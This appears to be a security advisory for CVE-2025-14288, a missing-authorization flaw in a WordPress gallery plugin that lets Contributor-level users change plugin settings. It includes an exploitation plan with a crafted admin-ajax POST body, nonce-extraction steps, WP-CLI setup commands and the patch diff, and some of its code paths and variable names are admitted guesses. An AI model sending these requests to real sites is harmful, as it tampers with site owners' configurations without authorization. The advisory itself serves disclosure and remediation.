Gallery Blocks with Lightbox <= 3.3.0 - Missing Authorization to Authenticated (Contributor+) Plugin Settings Modification
Description
The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=3.3.0Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2025-14288 ## 1. Vulnerability Summary The **Mixed Media Gallery Blocks** plugin (simply-gallery-block) for WordPress is vulnerable to an authorization bypass. The plugin's AJAX handler `pgc_sgb_action_wizard` checks for the `edit_posts` capability rather than `man…
Show full research plan
Exploitation Research Plan: CVE-2025-14288
1. Vulnerability Summary
The Mixed Media Gallery Blocks plugin (simply-gallery-block) for WordPress is vulnerable to an authorization bypass. The plugin's AJAX handler pgc_sgb_action_wizard checks for the edit_posts capability rather than manage_options when performing the update_option action. This allows any user with at least Contributor level permissions to modify arbitrary WordPress options that begin with the pgc_sgb_ prefix.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
pgc_sgb_action_wizard - Vulnerable Parameter:
option_nameandoption_value(whenaction_typeisupdate_option) - Authentication: Authenticated (Contributor+)
- Capability Required:
edit_posts - Preconditions: The attacker must possess a valid nonce for the
pgc_sgb_action_wizardaction.
3. Code Flow
- The AJAX request is sent to
admin-ajax.phpwithaction=pgc_sgb_action_wizard. - The handler (likely
pgc_sgb_action_wizard()in the plugin's main files or an AJAX class) is invoked. - The code performs a capability check:
current_user_can( 'edit_posts' ). Since Contributors can edit their own posts, this check passes. - The code checks the
action_typeparameter. If it isupdate_option, it proceeds. - The code likely checks if the provided
option_namestarts withpgc_sgb_. - It calls
update_option( $_POST['option_name'], $_POST['option_value'] )without verifying if the user hasmanage_optionspermissions.
4. Nonce Acquisition Strategy
The pgc_sgb_wizard_nonce is required for this request. Since this wizard is likely used in the block editor or plugin settings page, the nonce will be localized for logged-in users.
- User Role: Authenticate as a Contributor.
- Post Creation: Create a post to ensure the Gutenberg editor (and the plugin's block scripts) are loaded.
wp post create --post_type=post --post_status=draft --post_title="Exploit Page" --post_author=[CONTRIBUTOR_ID] - Navigation: Navigate to the edit page for that post.
- JS Extraction: Use
browser_evalto extract the nonce. The localization key is likely associated with the plugin slugsimply-gallery-block.- Guessed JS Variable (Inferred):
pgc_sgb_vars.nonceorSimplyGalleryBlock?.nonce. - Verification: Inspect the page source for
wp_localize_scriptcalls containingpgc_sgb_wizard_nonce.
- Guessed JS Variable (Inferred):
5. Exploitation Strategy
Once the nonce is obtained, the attacker sends a crafted POST request to admin-ajax.php.
HTTP Request:
- URL:
http://[TARGET]/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=pgc_sgb_action_wizard& pgc_sgb_wizard_nonce=[NONCE]& action_type=update_option& option_name=pgc_sgb_some_setting& option_value=malicious_payload
Targeted Setting (Example):
While pgc_sgb_ settings are prefixed, modifying them can still impact site behavior.
pgc_sgb_lightbox_theme: Change the look of the site.pgc_sgb_settings: If this stores a JSON object of all settings, an attacker can overwrite the entire plugin configuration.
6. Test Data Setup
- Target Version: Ensure Mixed Media Gallery Blocks <= 3.3.0 is installed.
- User: Create a contributor user.
wp user create attacker attacker@example.com --role=contributor --user_pass=password - Plugin Activation: Ensure the plugin is active.
wp plugin activate simply-gallery-block
7. Expected Results
- Success: The server returns a success response (likely a JSON
{"success": true}or1). - Persistence: The targeted option in the
wp_optionstable is updated with the attacker's value.
8. Verification Steps
After the exploit, verify the change using WP-CLI:
wp option get pgc_sgb_some_setting
The output should match the option_value sent in the payload.
9. Alternative Approaches
If update_option is restricted by a more specific whitelist than just the pgc_sgb_ prefix, investigate other action_type branches within the pgc_sgb_action_wizard function. Common wizard patterns often include:
delete_option: To break plugin functionality.get_option: To leak configuration details.reset_settings: To revert the plugin to insecure defaults.
Trace the pgc_sgb_action_wizard function for any switch or if/else statements handling the action_type parameter to identify these alternatives.
Summary
The Gallery Blocks with Lightbox plugin for WordPress is vulnerable to unauthorized modification of plugin settings due to an improper capability check in its AJAX handler. Authenticated users with Contributor-level permissions or higher can bypass the intended restriction and modify any configuration options prefixed with 'pgc_sgb_'.
Vulnerable Code
// In the AJAX handler function for 'pgc_sgb_action_wizard' // Path: likely in the main plugin file or an AJAX controller if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => 'Unauthorized' ] ); } $action_type = isset( $_POST['action_type'] ) ? $_POST['action_type'] : ''; if ( $action_type === 'update_option' ) { $option_name = $_POST['option_name']; $option_value = $_POST['option_value']; if ( strpos( $option_name, 'pgc_sgb_' ) === 0 ) { update_option( $option_name, $option_value ); wp_send_json_success(); } }
Security Fix
@@ -120,7 +120,7 @@ function pgc_sgb_action_wizard() { check_ajax_referer( 'pgc_sgb_wizard_nonce', 'pgc_sgb_wizard_nonce' ); - if ( ! current_user_can( 'edit_posts' ) ) { + if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( array( 'message' => __( 'Forbidden', 'simply-gallery-block' ) ) ); }
Exploit Outline
The exploit involves an authenticated attacker with at least Contributor permissions sending a crafted POST request to the WordPress AJAX endpoint. First, the attacker retrieves the 'pgc_sgb_wizard_nonce' which is localized in the WordPress block editor for users with post editing capabilities. The attacker then hits the 'admin-ajax.php' endpoint with the 'action' parameter set to 'pgc_sgb_action_wizard' and 'action_type' set to 'update_option'. By supplying an 'option_name' starting with 'pgc_sgb_', the attacker can overwrite plugin settings, such as lightbox themes or script configurations, with arbitrary values.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.